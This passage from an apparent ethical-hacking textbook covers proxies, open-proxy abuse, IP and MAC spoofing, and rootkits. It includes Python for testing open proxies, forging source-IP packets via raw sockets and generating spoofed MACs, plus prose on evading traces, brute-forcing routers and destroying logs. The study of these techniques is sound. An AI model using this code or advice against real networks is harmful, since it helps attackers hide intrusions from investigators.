request with the content in its cache thus improving the overall request-
reply speed.
Transparent Proxy:
A transparent proxy server is also a caching server, but it is deployed so
that no client-side (browser-side) configuration is needed. Typically the
proxy resides on the gateway and intercepts the clients' web requests
(port 80, and often 443), fetches the content the first time and
subsequently replies from its local cache. It is called transparent
because the client does not know that a proxy is mediating its requests.
Note that traffic on port 443 is TLS-encrypted, so a transparent proxy
can only pass it through unless it also performs TLS interception with a
certificate the clients trust; it cannot cache or inspect it otherwise.
Transparent proxies are mostly used in large corporate organizations
where client-side configuration is not practical (because of the number
of clients). ISPs also use them to reduce bandwidth usage.128
127 http://blog.eukhost.com/webhosting/proxy-server-2/
Reverse Proxy:
A reverse proxy is totally different in its usage because it is used for the
benefit of the web server rather than its clients. Basically a reverse proxy
is on the web server end which will cache all the static answers from the
web server and reply to the clients from its cache to reduce the load on
the web server. This type of setup is also known as Web Server
Acceleration.
128 http://www.webupd8.org
There are many different types of proxy servers. Depending on the purpose,
you can get proxy servers to route any of these common protocols, and
many more:
1) FTP Proxy Server:
FTP clients can connect to FTP servers directly and transmit or receive
files over direct socket connections, but in some cases the FTP clients
need to be protected or controlled, and an FTP proxy is placed between
them and the server. An FTP server listens for client requests on port
21, so a client that wants to talk to a server connects to port 21, sends
its identification data (user name and password) to authenticate itself,
and then issues its request, all within one TCP control connection, as
in figure 1.
2) HTTP Proxy Server:
HTTP proxy servers offer several levels of anonymity. Which level is
needed depends on what the proxy is used for, so anonymity is not always
a requirement. By their degree of anonymity, HTTP proxies can roughly be
divided into:129
- Transparent: these proxies are not anonymous. They let the web server
  know that a proxy is in use and also give away the client's IP address
  (typically in an X-Forwarded-For or similar header). Their task, as a
  rule, is caching and/or sharing Internet access among several
  computers over a single connection.
- Anonymous: these proxies let the remote web server know that a proxy
  is in use (for example through a Via header), but they do not pass on
  the client's IP address.
- Distorting: unlike the previous type, they do pass an IP address to
  the remote web server, but that address is a phantom, either randomly
  generated by the proxy or some fixed address that is not yours. These
  proxies thus distort your IP address as seen by the web server.
- High anonymous (elite): they do not send your IP address to the remote
  computer, and they do not reveal that a proxy is in use at all, so the
  web server "thinks" it is talking directly to the client.
129 http://www.freeproxy.ru/en/free_proxy/faq/what_is_http_proxy.htm
3) Socks Proxy Server:
A SOCKS server is a general purpose proxy server that
establishes a TCP connection to another server on behalf of a
client, then routes all the traffic back and forth between the client
and the server. It works for any kind of network protocol on any
port. SOCKS Version 5 adds additional support for security and
UDP. The SOCKS server does not interpret the network traffic
between client and server in any way, and is often used because
clients are behind a firewall and are not permitted to establish TCP
connections to servers outside the firewall unless they do it
through the SOCKS server. Most web browsers for example can be
configured to talk to a web server via a SOCKS server. Because the
client must first make a connection to the SOCKS server and tell it
the host it wants to connect to, the client must be "SOCKS
enabled." 130
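The SOCKS5 exchange the paragraph describes, as an added example (not from the book and not from any SOCKS implementation): the client greeting, the server's method selection, the CONNECT request and the server reply, encoded and parsed byte for byte as RFC 1928 lays them out, with a small server-side handler so both ends of the exchange are visible. No network traffic is sent; the proxy address 10.0.0.1, the bound port and the ruleset are constructed.

```python
import ipaddress
import struct

VER = 0x05
NO_AUTH, NO_ACCEPTABLE = 0x00, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0: "succeeded", 1: "general SOCKS server failure",
    2: "connection not allowed by ruleset", 3: "network unreachable",
    4: "host unreachable", 5: "connection refused", 6: "TTL expired",
    7: "command not supported", 8: "address type not supported",
}


def client_greeting(methods=(NO_AUTH,)):
    """VER | NMETHODS | METHODS: the first thing a SOCKS-enabled client sends."""
    return bytes([VER, len(methods), *methods])


def parse_method_selection(data):
    """VER | METHOD from the server; 0xFF means no method in common."""
    if len(data) < 2 or data[0] != VER:
        raise ValueError("not a SOCKS5 method selection")
    if data[1] == NO_ACCEPTABLE:
        raise ConnectionError("server accepts none of our auth methods")
    return data[1]


def _encode_address(host):
    # Literal IPs go as ATYP 1/4; names go as ATYP 3 so the proxy does the
    # DNS lookup, which keeps the client's own resolver from leaking the target.
    try:
        ip = ipaddress.ip_address(host)
        return bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    except ValueError:
        name = host.encode("idna")
        if not 0 < len(name) < 256:
            raise ValueError("domain name length out of range")
        return bytes([ATYP_DOMAIN, len(name)]) + name


def _decode_address(data, off):
    atyp = data[off]
    if atyp == ATYP_IPV4:
        return str(ipaddress.IPv4Address(data[off + 1:off + 5])), off + 5
    if atyp == ATYP_IPV6:
        return str(ipaddress.IPv6Address(data[off + 1:off + 17])), off + 17
    if atyp == ATYP_DOMAIN:
        n = data[off + 1]
        return data[off + 2:off + 2 + n].decode("idna"), off + 2 + n
    raise ValueError("unknown address type %d" % atyp)


def connect_request(host, port):
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT: 'connect me to host:port'."""
    return bytes([VER, CMD_CONNECT, 0x00]) + _encode_address(host) + struct.pack("!H", port)


def parse_connect_request(data):
    """Server side: recover the (host, port) the client asked for."""
    if data[0] != VER or data[1] != CMD_CONNECT:
        raise ValueError("only CONNECT is handled here")
    host, off = _decode_address(data, 3)
    return host, struct.unpack("!H", data[off:off + 2])[0]


def server_reply(rep, bnd_host, bnd_port):
    """VER | REP | RSV | ATYP | BND.ADDR | BND.PORT from the server."""
    return bytes([VER, rep, 0x00]) + _encode_address(bnd_host) + struct.pack("!H", bnd_port)


def parse_reply(data):
    """Client side: (rep code, text, bound address, bound port)."""
    if data[0] != VER:
        raise ValueError("not a SOCKS5 reply")
    rep = data[1]
    host, off = _decode_address(data, 3)
    return rep, REPLY_TEXT.get(rep, "unassigned"), host, struct.unpack("!H", data[off:off + 2])[0]


def run_exchange(target_host, target_port, ruleset=lambda h, p: True):
    """Simulate both ends of one CONNECT through a constructed proxy at 10.0.0.1."""
    parse_method_selection(bytes([VER, NO_AUTH]))     # server answered client_greeting()
    req = connect_request(target_host, target_port)
    host, port = parse_connect_request(req)            # what the proxy sees
    rep = 0 if ruleset(host, port) else 2              # 2 = not allowed by ruleset
    return parse_reply(server_reply(rep, "10.0.0.1", 40000 if rep == 0 else 0))


if __name__ == "__main__":
    print(run_exchange("example.com", 80))
    print(run_exchange("example.com", 25, ruleset=lambda h, p: p != 25))
```

Because the proxy never looks past these few bytes, anything the client sends after a "succeeded" reply is relayed untouched, which is why SOCKS works for any TCP protocol and why a ruleset on the proxy is the only place to stop, say, outbound SMTP.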
What your browser transmits to a web server:
- name and version of the operating system
- name and version of the browser
- configuration of the browser (display resolution, color depth, Java/
  JavaScript support, ...)
- the client's IP address
- other information
The most important item is the IP address. From your IP address it is
possible to learn:
- the country you are in
- the city (approximately, from geolocation databases)
- your provider's name and abuse contact e-mail
- your physical address, but only through the provider's subscriber
  records, which is why investigators go to the ISP with a timestamp and
  the IP address
130 http://www.jguru.com/faq/view
18.4 Use of Proxy Server for attack
Preparing proxy servers is the last step in the CEH scanning
methodology. A proxy server is a computer that acts as an intermediary
between the hacker and the target computer. Using a proxy server can
allow a hacker to become anonymous on the network. The hacker first
makes a connection to the proxy server and then requests a connection
to the target computer via the existing connection to the proxy.
Essentially, the proxy requests access to the target computer, not the
hacker’s computer. This lets a hacker surf the Web anonymously or
otherwise hide their attack.
Socks-Chain is a tool that gives a hacker the ability to attack through a
chain of proxy servers. The main purpose of doing this is to hide the
hacker’s real IP address and therefore minimize the chance of detection.
When a hacker works through several proxy servers in series, it’s much
harder to locate the hacker. Tracking the attacker’s IP address through
the logs of several proxy servers is complex and tedious work. If one of
the proxy servers’ log files is lost or incomplete, the chain is broken, and
the hacker’s IP address remains anonymous.131
If the proxy server is open
This section discusses the abuse of mis-configured HTTP proxy servers,
taking a detailed look at the types of traffic that flow through this
underground network. Also discussed is the use of a "honeyproxy", a server
designed to look like a mis-configured HTTP proxy. With such a tool we can
observe the Internet underground without the need for a full-blown
honeypot.
The widespread abuse of proxies started years ago with a program called
WinGate. Before Windows had Internet connection sharing built in, people
with a home network needed a way to route all their machines' Internet
traffic through a single dialup. WinGate served this purpose, but
unfortunately it shipped with an insecure default configuration: anyone
could connect to your WinGate server and telnet back out to another
machine on another port. The company that wrote the software eventually
closed the hole, but the original versions were widely deployed and
infrequently upgraded.
131 http://luizfirmino.blogspot.in/2011/07/understand-how-proxy-servers-are-used.html
Users of Internet Relay Chat (IRC) were particularly interested in these
WinGate proxy servers, since attacks such as WinNuke and ping flooding
were becoming popular at the same time. If you could disguise your IP
address when connecting to an IRC server, you could let someone else
take the beating when you were under attack from another IRC user. Of
course, knowledge of how to use proxies gave an advantage to the
attacker as well, as they could also hide the origin of the attack. IRC and
proxy abuse became forever intertwined. Many modern IRC servers will not
even let you connect without first probing several ports on your IP
address in an attempt to ensure you are not connecting through an open
proxy.
Turning to the modern day, we see a second trend in proxy use. Web
traffic has grown at a phenomenal rate over the past 7 years. Companies
and ISPs often turn to caching proxy servers to reduce the tremendous
load on their networks. In order to satisfy the demands of their content-
hungry users, these proxy servers are often configured to proxy any port,
with little regard to security. If there are no access controls blocking
connections from outside the network, this makes it possible to
anonymously port scan the entire TCP port range of other outside
systems. Even worse, some proxies will allow you to connect in reverse,
to machines on the company's internal network.
How to Find Open Proxies
There is no need to port scan huge blocks of IP addresses looking for open
proxy servers. Lists of open proxies can be found in seconds with a
simple Google search. These lists are frequently updated, and some even
include bandwidth statistics for each server. It should be noted,
however, that most of these proxies are not supposed to be public: it is
very common for a novice administrator to set up a proxy or HTTP cache
that accepts connections from anywhere. There are also programs
available on the Internet that automatically redirect your traffic
through different proxies, and some of them chain proxies together for
additional protection.
a. Method
For a standard HTTP request, testing is as easy as telnetting to the proxy
on its designated port, entering a request such as "GET
http://www.yahoo.com/ HTTP/1.0" and pressing Enter twice. If the proxy
is mis-configured, it returns the page from Yahoo, which means the proxy
is ripe for abuse. When a proxy abuser finds a fresh proxy, the first
step is to test its anonymity value. Some proxies pass the IP address of
the requesting host in the HTTP headers (X-Forwarded-For is the usual
one), which would be detrimental to illegitimate activities. For a
computer criminal, the ideal proxy passes zero information about the
real host and effectively makes the proxy look like the true attack
source. Testing this is easy: several sites will show you the complete
headers of your HTTP request as the server received them, and some even
score the anonymity of the proxy for you.
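The two steps just described, the telnet-style openness test and the anonymity scoring, together with the four anonymity levels listed earlier under 2) HTTP Proxy Server, as one added example (not from the book and not from any proxy-testing site). The "header echo" page, its JSON format, the hostnames and every address are constructed assumptions; the real `raw_send` transport exists but the demo injects canned responses so it runs offline.

```python
import json
import re
import socket

# Constructed assumption: a "what headers did you receive" page that answers with
# JSON like {"origin": "<address it saw>", "headers": {...}}.
PROBE_URL = "http://headers.example/json"
PROXY_MARKERS = ("via", "x-forwarded-for", "forwarded", "x-proxy-id",
                 "proxy-connection", "x-bluecoat-via", "x-cache")
CLIENT_IP_HEADERS = ("x-forwarded-for", "forwarded", "x-real-ip", "client-ip")


def build_probe_request(url=PROBE_URL):
    """What you would type into telnet: absolute URI, HTTP/1.0, blank line to end."""
    host = url.split("/")[2]
    return ("GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (url, host)).encode()


def raw_send(proxy_host, proxy_port, payload, timeout=5.0):
    """Real transport: TCP to the proxy port, send, read until close.
    The offline demo below injects canned bytes instead of calling this."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(payload)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_http_response(raw):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify_anonymity(echo, my_ip):
    """Transparent / anonymous / distorting / elite, as defined in the text."""
    if echo["origin"] == my_ip:
        return "not proxied"
    received = {k.lower(): v for k, v in echo["headers"].items()}
    forwarded = " ".join(v for k, v in received.items() if k in CLIENT_IP_HEADERS)
    tokens = set(re.split(r'[ ,;="]+', forwarded)) - {""}
    if my_ip in tokens:
        return "transparent"      # proxy announced itself AND leaked our IP
    if tokens:
        return "distorting"       # passed an IP, but a phantom one
    if any(k in received for k in PROXY_MARKERS):
        return "anonymous"        # proxy visible, our IP not
    return "elite"                # server sees nothing but the proxy


def probe(proxy_host, proxy_port, my_ip, transport=raw_send):
    """Step 1: is it open? Step 2: how much does it leak?"""
    raw = transport(proxy_host, proxy_port, build_probe_request())
    status, _headers, body = parse_http_response(raw)
    if not 200 <= status < 300:
        return {"open": False, "status": status}
    echo = json.loads(body.decode("utf-8"))
    return {"open": True, "status": status, "anonymity": classify_anonymity(echo, my_ip)}


def canned(origin, **hdrs):
    """Constructed echo-page replies standing in for real proxies."""
    body = json.dumps({"origin": origin, "headers": hdrs}).encode()
    return b"HTTP/1.0 200 OK\r\nContent-Type: application/json\r\n\r\n" + body


MY_IP = "198.51.100.7"   # constructed "real" address of the tester
SAMPLES = {
    "transparent": canned("203.0.113.9", Via="1.1 cache1", **{"X-Forwarded-For": MY_IP}),
    "anonymous":   canned("203.0.113.9", Via="1.1 cache1"),
    "distorting":  canned("203.0.113.9", Via="1.1 cache1", **{"X-Forwarded-For": "10.77.1.1"}),
    "elite":       canned("203.0.113.9"),
    "closed":      b"HTTP/1.0 403 Forbidden\r\nContent-Type: text/html\r\n\r\n<html>denied</html>",
}


def demo():
    return {name: probe("proxy.example", 8080, MY_IP,
                        transport=lambda h, p, payload, raw=raw: raw)
            for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

The same classifier is useful on the defending side: a web server that logs `X-Forwarded-For` and `Via` can tell "transparent" corporate caches from deliberately anonymised traffic with exactly this logic.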
b. Setup
To learn more about what kinds of activities are happening on the vast
network of open proxy servers, we set up our own "faux" proxy server.
Basically, we took Randall Schwartz's Anonymous Proxy Server and
modified it for our purposes, using regular expressions and the logic
below:
1. Log all request URLs and complete headers.
2. If a request is bound for a URL that looks like a proxy test, let it
pass.
3. If a request includes HTTP authentication headers, return a "404
denied".
4. If a request is of method type "HEAD", return a "200 Ok" message
5. If a request is of method type "CONNECT", return a "404 Denied"
message
6. If a request looks like an image, return a 1x1 transparent gif
7. All other requests return a blank HTML page.
This should be sufficient to allow us to spy on the malicious activity
passing through our "honeyproxy", while not actually allowing attacks
through to their destinations. Of course, there are ways to fool the
regular expression code, so it is not recommended to leave something
like this in place long enough to give an attacker time to figure out how
to bypass the restrictions unless you are willing to put some extra time
into securing the script.
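The seven-rule logic above, as an added example (not the original honeyproxy script and not Randal Schwartz's code): each incoming request is logged, then answered according to rules 2 to 7 in the order the text gives them. The regular expressions that decide what "looks like a proxy test" and what "looks like an image", the client addresses and the sample requests are constructed for illustration.

```python
import base64
import re
from dataclasses import dataclass

# The usual minimal transparent GIF, served for rule 6.
TRANSPARENT_GIF = base64.b64decode(
    "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7")
BLANK_HTML = b"<html><head></head><body></body></html>"
# Constructed heuristics: what "looks like a proxy test" and "looks like an image".
PROXY_TEST_RE = re.compile(r"proxy[-_]?(test|check|judge|chk)|azenv|env\.cgi|whatismyip|myip", re.I)
IMAGE_RE = re.compile(r"\.(gif|jpe?g|png|ico|bmp)$", re.I)


@dataclass
class Decision:
    action: str          # "pass": forward for real; "fake": answer it ourselves
    status: str          # HTTP status line to send when faking
    body: bytes
    content_type: str


def parse_request(raw):
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers


def decide(method, target, headers):
    """Rules 2-7 from the list above, applied in that order."""
    if PROXY_TEST_RE.search(target):                                  # rule 2
        return Decision("pass", "", b"", "")
    if "proxy-authorization" in headers or "authorization" in headers:  # rule 3
        return Decision("fake", "404 Denied", b"", "text/plain")
    if method == "HEAD":                                              # rule 4
        return Decision("fake", "200 OK", b"", "text/html")
    if method == "CONNECT":                                           # rule 5
        return Decision("fake", "404 Denied", b"", "text/plain")
    if IMAGE_RE.search(target.split("?", 1)[0]):                      # rule 6
        return Decision("fake", "200 OK", TRANSPARENT_GIF, "image/gif")
    return Decision("fake", "200 OK", BLANK_HTML, "text/html")        # rule 7


def render(decision):
    """Bytes to write back to the client for a faked answer."""
    head = "HTTP/1.0 %s\r\nContent-Type: %s\r\nContent-Length: %d\r\n\r\n" % (
        decision.status, decision.content_type, len(decision.body))
    return head.encode() + decision.body


class HoneyProxy:
    def __init__(self):
        self.log = []    # rule 1: every URL and the complete headers

    def handle(self, client_ip, raw):
        method, target, headers = parse_request(raw)
        self.log.append({"client": client_ip, "method": method,
                         "url": target, "headers": headers})
        return decide(method, target, headers)


if __name__ == "__main__":
    hp = HoneyProxy()
    for req in (b"GET http://www.yahoo.com/logo.gif HTTP/1.0\r\nHost: www.yahoo.com\r\n\r\n",
                b"CONNECT mail.example:25 HTTP/1.0\r\n\r\n"):
        d = hp.handle("203.0.113.5", req)
        print(d.action, d.status, d.content_type, len(d.body))
```

Rule 2 is the weak point the text warns about: anything matching the "proxy test" pattern is forwarded for real, so an attacker who guesses the pattern (or a URL that happens to contain "myip") gets a working proxy, which is why the script should not be left running unattended.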
18.5 IP address Spoofing
IP address spoofing, or IP spoofing, is the creation of Internet
Protocol (IP) packets with a forged source IP address, with the purpose
of concealing the identity of the sender or impersonating another
computing system.
IP Spoofing
Disguising your IP address with proxies is an easy way to achieve relative
anonymity on the Internet. Relative anonymity means that an investigating
team could still find you, but it would take them extra time. It works
as a preliminary line of defense for light corporate work and personal
grudges.
Disguising your IP address with proxies is often lumped together with IP
spoofing, but they are different things. IP spoofing involves altering
your outbound packets so that their source address field carries an IP
other than your own. It is harder to do, and much harder to track, but
it has a cost: the replies to a spoofed packet are delivered to the
forged address, not to you, so raw spoofing is "blind" and suits attacks
that do not need the answer (flooding, amplification, some session
prediction attacks) rather than ordinary web browsing.
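What "a forged source IP address" means at the byte level, as an added example (not from the book): an IPv4 header is built with whatever source address we choose, its checksum computed so routers accept it, and a UDP payload attached. Only the builder and parser run here; `send_raw` shows the raw-socket call a spoofing tool would make, needs root, and is not exercised. All addresses are constructed documentation ranges.

```python
import ipaddress
import socket
import struct


def inet_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, payload_len, proto=socket.IPPROTO_UDP, ttl=64, ident=0x1234):
    """A 20-byte IPv4 header whose source field is whatever we say it is."""
    fields = [
        (4 << 4) | 5,           # version 4, IHL = 5 words (20 bytes)
        0,                      # DSCP/ECN
        20 + payload_len,       # total length
        ident, 0,               # identification; flags + fragment offset
        ttl, proto,
        0,                      # checksum placeholder, filled below
        ipaddress.IPv4Address(src).packed,
        ipaddress.IPv4Address(dst).packed,
    ]
    hdr = struct.pack("!BBHHHBBH4s4s", *fields)
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def parse_ipv4_header(hdr):
    """What a router (or a defender's packet capture) sees in the header."""
    v_ihl, _, total, _ident, _, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", hdr[:20])
    return {
        "version": v_ihl >> 4, "ihl": v_ihl & 0xF, "total_length": total,
        "ttl": ttl, "proto": proto,
        "src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
        # a header is intact when the sum including its own checksum is all ones
        "checksum_ok": inet_checksum(hdr[:20]) == 0,
    }


def spoofed_udp_packet(fake_src, dst, payload, sport=53, dport=53):
    """Forged-source IP header plus a UDP datagram (UDP checksum 0 = omitted)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    return build_ipv4_header(fake_src, dst, len(udp)) + udp


def send_raw(packet, dst):
    """Put the forged packet on the wire. Requires root / CAP_NET_RAW; with
    IPPROTO_RAW the Linux kernel treats our bytes as the complete IP header.
    Not called by the tests: it needs privileges and a real destination."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(packet, (dst, 0))


if __name__ == "__main__":
    pkt = spoofed_udp_packet("198.51.100.200", "192.0.2.10", b"hello")
    print(parse_ipv4_header(pkt))
```

Two consequences follow directly from the bytes. The server's reply is addressed to 198.51.100.200, so the sender never sees it, and any ISP that filters egress traffic for source addresses it does not own (BCP 38) drops the packet at the first hop; that filtering, not tracing, is the standard defence.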
What is often described as "IP spoofing" in hacker folklore is really a
relay chain: the attacker's traffic is routed through a series of
compromised routers or hosts, each of which rewrites the packets so that
the requests reaching the server appear to come from the last hop, and
the responses are relayed back hop by hop until the final hop delivers
them to the attacker's real IP address. This is address translation
through a chain of hops, not a forged source field, and it works only
because each hop keeps state to route the replies back.
If any link in that chain is discovered, the typical administrator's
response is to disable it immediately. At that point the attacker stops
receiving response traffic and knows that a link has been compromised,
and will start removing the redirections from the other routers in the
chain and destroying log files, hoping to dismantle the whole chain
before a second link is found.
Administrators who want to catch the attacker, and who are not naive,
will not disable the redirection. Instead they follow the traffic until
they reach the real IP, by contacting the administrators of the other
hops and asking them to trace the redirections on their systems.
Attackers try to defeat this by periodically rotating the relay path.
Hiding behind a proxy works similarly, except that both your requests and
the responses go through the same server. Once you connect to a proxy
server, all the network traffic you generate goes through it and the
proxy forwards your requests to their destination. If you request a
website, for instance, the web server believes that the request comes
from the proxy machine; it never sees who originally made the request.
The only way the request can then be traced back to your IP address is by
getting access to the proxy server's logs and correlating them with the
web server's logs: not impossible, but time consuming.
The appeal of proxies is that many are open and free to use. A common
naming convention is proxy.organization_name.org (or similar), so one
quick check is to resolve or ping such a name to see whether the machine
exists. ISPs run the largest numbers of proxy machines.
Once you have found five or so proxies, you can enter their details into
your web browser to verify that they are open. In older browsers such as
Netscape this was under Options | Network Preferences, 'Proxies' tab,
'Manual Proxy config'; in Internet Explorer under View | Options,
'Connection' tab; any current browser or operating system has an
equivalent manual proxy setting. Set it up for HTTP only at first; once
you have verified that the proxy is open, try the other protocols. Most
proxies listen on port 8080, but not always (3128 and 80 are also
common).
Once you are using an open proxy, your real IP address will not show up
in guestbooks, counter logs, web message boards or Java/HTML chat rooms.
Browser-based FTP becomes anonymous as far as the FTP server can tell.
You may also be granted access to 'customer only' FTP servers that trust
the proxy's address, and web applications such as Hotmail will record
the IP of the proxy instead of your own.
A more advanced attacker writes a utility that keeps a record of a chain
of compromised routers. It uses the existing chain to scan for and
identify new routers, performs a brief brute-force attack against them
(many router administrators use passwords of fewer than four
characters), and replaces the oldest router in the path with the newly
compromised one, thus creating a constantly changing relay path.
18.6 MAC address spoofing
When you attack something or someone on the Internet, you do not want
your IP address to leak out, because your ISP can trace you from two
simple pieces of information: the time and the IP address. So attackers
use a proxy, or even a chain of proxies, to avoid being traced directly
from the victim's firewall logs. But what if the administrator of the
proxy server keeps logs and your IP is recorded there? The proxy
administrator may pass your information to your ISP and you still get
caught at the end of the day. Remember also that whoever controls the
network you are connected to can learn a lot about you, and one such item
is your MAC address.
A MAC address, short for Media Access Control address, is a unique code
assigned to most forms of networking hardware. The address is burned into
the hardware by the manufacturer, which is why closed wireless networks
use MAC filtering, limiting access to a list of known wireless cards, as
a (weak) security feature.
In short, every network card (NIC) has a unique address. On Windows you
can run the command "ipconfig /all" to reveal your MAC address; note that
the ipconfig output calls it the Physical Address.
Two caveats matter here. First, a MAC address is only visible on the
local network segment: it is not carried across routers, so a remote web
server or a distant proxy never sees it. It is the ISP (through DHCP
logs, cable modem or access point records) or the administrator of the
local network who can tie a MAC address to a connection. Second,
although the address is burned in, almost every operating system lets
you override it in software, and that is what MAC spoofing means.
So if your IP address is combined with your MAC address in the ISP's
records, there is little room to deny the connection. If you spoof or
change your MAC address before connecting, the record no longer points at
your hardware, and the evidence tying the session to your machine is
weaker.
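Reading the Physical Address out of "ipconfig /all" and choosing a spoof address that will not collide with a real vendor assignment, as an added example (not from the book). The ipconfig output is a constructed sample, not captured from a real machine; the vendor prefix is illustrative.

```python
import re
import secrets

# Constructed sample of "ipconfig /all" output (not from a real machine).
IPCONFIG_SAMPLE = """
Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : corp.example
   Description . . . . . . . . . . . : Intel(R) Ethernet Connection
   Physical Address. . . . . . . . . : 00-1B-21-3C-4D-5E
   DHCP Enabled. . . . . . . . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.1.23(Preferred)

Wireless LAN adapter Wi-Fi:

   Description . . . . . . . . . . . : Wireless-AC 9560
   Physical Address. . . . . . . . . : 02-5E-1A-77-90-C3
"""

MAC_RE = re.compile(r"Physical Address[ .]*: ([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})")
VALID_MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def physical_addresses(ipconfig_text):
    """Every MAC in the output, normalised to lower-case colon form."""
    return [m.replace("-", ":").lower() for m in MAC_RE.findall(ipconfig_text)]


def is_valid_mac(mac):
    return VALID_MAC_RE.match(mac) is not None


def first_octet(mac):
    return int(mac.split(":")[0], 16)


def is_locally_administered(mac):
    """Bit 1 of the first octet (the U/L bit) is set on software-assigned MACs,
    clear on manufacturer-assigned ones; it is how a spoofed address can be spotted."""
    return bool(first_octet(mac) & 0x02)


def is_multicast(mac):
    """Bit 0 of the first octet marks a group address; a NIC address must be unicast."""
    return bool(first_octet(mac) & 0x01)


def vendor_prefix(mac):
    """The OUI (first three octets) identifies the manufacturer of a burned-in MAC."""
    return mac[:8]


def random_local_mac():
    """A spoof address: unicast, locally administered, random remainder."""
    first = (secrets.randbits(8) | 0x02) & 0xFE
    return ":".join("%02x" % b for b in [first, *secrets.token_bytes(5)])


if __name__ == "__main__":
    for mac in physical_addresses(IPCONFIG_SAMPLE):
        print(mac, "vendor" if not is_locally_administered(mac) else "locally administered",
              vendor_prefix(mac))
    print("new spoof address:", random_local_mac())
```

On Linux the address chosen here is applied with `ip link set dev eth0 address <mac>` while the interface is down; on Windows it goes into the adapter's "Network Address" property. Note what the U/L bit gives away: a network operator who sees a locally administered address on a port that used to show a vendor OUI has a strong hint that the NIC's address was changed.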
CHAPTER 19
ROOTKIT
Objective
19.1 Introduction
19.2 Definition of Rootkit
19.3 Function of Rootkit
19.4 Types of Rootkit
19.5 Computer Infection
19.6 Symptoms of Rootkit
19.7 Removal of Rootkit
19.8 Protection
19.1 Introduction
It is not a virus: it is not intended to modify files or to cause damage.
It is not a worm: it does not spread itself from machine to machine.
It is not spyware, although it can spy on its victim.
It has RAT, Trojan and backdoor features, but its purpose goes much
further:
It is a rootkit.132
[Figure]133
132 http://kareldjag.over-blog.com/article-895476.html
133 http://briteccomputers.co.uk/wp-content/uploads/2012/10/qrazy84.jpg
Everyone knows about computer viruses and people are rightly fearful of
them. Many have also heard about (computer) worms, which are nasty
programs designed to spread as much as they can to infect computers.
A Rootkit, on the other hand, is devious in a different way. This
unwanted code on your desktop is used to gain control over your desktop
by hiding deep inside your system. Unlike most viruses, it is not directly
destructive and unlike worms, its objective is not to spread infection as
wide as possible.134
At the core of the term "Rootkit" are two words i.e. "root" and "kit". Root
refers to the all-powerful, "Administrator" account on UNIX and Linux
systems, and kit refers to a set of programs or utilities that allow
someone to maintain root-level access to a computer. However, one other
aspect of a rootkit, beyond maintaining root-level access, is that the
presence of the rootkit should be undetectable.135
19.2 Rootkit
A rootkit is a set of software components intended to conceal running
processes, files or system data from the operating system and its users.
In recent years, rootkits have increasingly been used by malware to help
intruders maintain access to systems while avoiding detection. Rootkits
often modify parts of the operating system or install themselves as
drivers or kernel modules.
The term rootkit is also used to describe the mechanisms and techniques
whereby malware, including viruses, spyware, and Trojans, attempt to
hide their presence from spyware blockers, antivirus, and system
management utilities. There are several rootkit classifications depending
134 http://www.guidingtech.com/4467/what-is-a-rootkit/
135 http://netsecurity.about.com/od/frequentlyaskedquestions/f/faq_rootkit.htm
on whether the malware survives reboot and whether it executes in user
mode or kernel mode.136
A rootkit is a stealthy type of software, often malicious, designed to
hide the existence of certain processes or programs from normal methods
of detection and to enable continued privileged access to a computer.
Rootkit installation can be automated, or an attacker can install it
once they have obtained root or Administrator access. That access is the
result of a direct attack on the system: exploiting a known
vulnerability, obtaining a password (by cracking or social engineering),
or escalating privileges from a lower-privileged foothold. Once
installed, the rootkit makes it possible to hide the intrusion as well
as to maintain privileged access. The key is the root/Administrator
access: full control over a system means that existing software can be
modified, including the software that might otherwise be used to detect
or remove the rootkit.
A rootkit is an application (or set of applications) that hides its
presence, or the presence of another application (virus, spyware, etc.),
on the computer by using some of the lower layers of the operating
system (API function redirection, use of undocumented OS functions,
etc.), which makes it almost undetectable by common anti-malware
software.137
19.3 So what does a Rootkit do?
A rootkit is designed to give a remote user access to all your folders,
both private data and system files; that user, with administrative
powers, can do whatever he wants with your computer. Needless to say,
every user should be aware of the threat rootkits pose.
136 http://www.rootkitfinder.com/rootkit.htm
137 http://www.avg.com/ww-en/faq.num-2353
Rootkits generally go much deeper than the average virus. They may even
infect your BIOS!138 They are often considered Trojan horses, and indeed
may contain Trojans and backdoors as part of the rootkit.
A rootkit is designed to:
- hide logins
- hide processes
- hide files and logs
- intercept data from terminals, network connections, and the keyboard
- provide access to files and folders, in short all the data
- provide administrative access.139
19.4 Types of Rootkit:
